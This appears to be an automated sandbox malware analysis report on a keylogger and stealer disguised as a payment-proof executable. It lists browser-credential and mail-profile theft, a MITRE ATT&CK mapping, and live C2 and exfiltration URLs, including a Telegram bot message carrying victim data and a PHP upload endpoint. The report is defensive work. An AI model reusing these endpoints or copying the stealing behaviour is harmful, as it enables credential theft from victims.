Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_0100091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

1_2_0100091D

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_0102B340 GetUserNameW,

1_2_0102B340

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FE1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_00FE1E8E

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FCDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_00FCDDC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3733442866.0000000003019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: z30ProofofPaymentAttached.exe	Binary or memory string: WIN_81
Source: z30ProofofPaymentAttached.exe	Binary or memory string: WIN_XP
Source: z30ProofofPaymentAttached.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: z30ProofofPaymentAttached.exe	Binary or memory string: WIN_XPe
Source: z30ProofofPaymentAttached.exe	Binary or memory string: WIN_VISTA
Source: z30ProofofPaymentAttached.exe	Binary or memory string: WIN_7
Source: z30ProofofPaymentAttached.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3733442866.0000000003019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_01008C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		1_2_01008C4F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_0100923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		1_2_0100923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	127 System Information Discovery	Distributed Component Object Model	11 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	2 Valid Accounts	LSA Secrets	131 Security Software Discovery	SSH	3 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Virtualization/Sandbox Evasion	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
z30ProofofPaymentAttached.exe	32%	ReversingLabs	Win32.Trojan.AutoitInject
z30ProofofPaymentAttached.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://mzgold.ir	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
mzgold.ir	217.144.107.148	true	true	unknown
reallyfreegeoip.org	188.114.97.3	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2019/11/2024%20/%2005:20:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/155.94.241.187	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	RegSvcs.exe, 00000007.00000002.3733442866.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20a	RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
https://www.office.com/lB	RegSvcs.exe, 00000007.00000002.3733442866.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mzgold.ir	RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003019000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r10.o.lencr.org0#	RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3732731828.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.00000000063AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.0000000006378000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003029000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	RegSvcs.exe, 00000007.00000002.3733442866.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en8	RegSvcs.exe, 00000007.00000002.3733442866.0000000002FAC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/8	RegSvcs.exe, 00000007.00000002.3733442866.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	RegSvcs.exe, 00000007.00000002.3733442866.0000000003019000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3732731828.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.00000000063AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003029000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3732731828.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.00000000063AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003029000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	RegSvcs.exe, 00000007.00000002.3733442866.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	RegSvcs.exe, 00000007.00000002.3733442866.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/155.94.241.187$	RegSvcs.exe, 00000007.00000002.3733442866.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r10.i.lencr.org/0	RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3732731828.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.00000000063AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.0000000006378000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003029000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
217.144.107.148	mzgold.ir	Iran (ISLAMIC Republic Of)	204213	NETMIHANIR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557792
Start date and time:	2024-11-18 16:31:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	z30ProofofPaymentAttached.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 58 Number of non-executed functions: 289
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: z30ProofofPaymentAttached.exe

Simulations

Behavior and APIs

Time	Type	Description
10:32:30	API Interceptor	10380359x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse
188.114.97.3	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
	View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htm	Get hash	malicious	Unknown	Browse	f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse	paste.ee/d/YU1NN
	TT copy.exe	Get hash	malicious	FormBook	Browse	www.lnnn.fun/u5w9/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/iiEh1iM3/download
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/dc8Ru

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
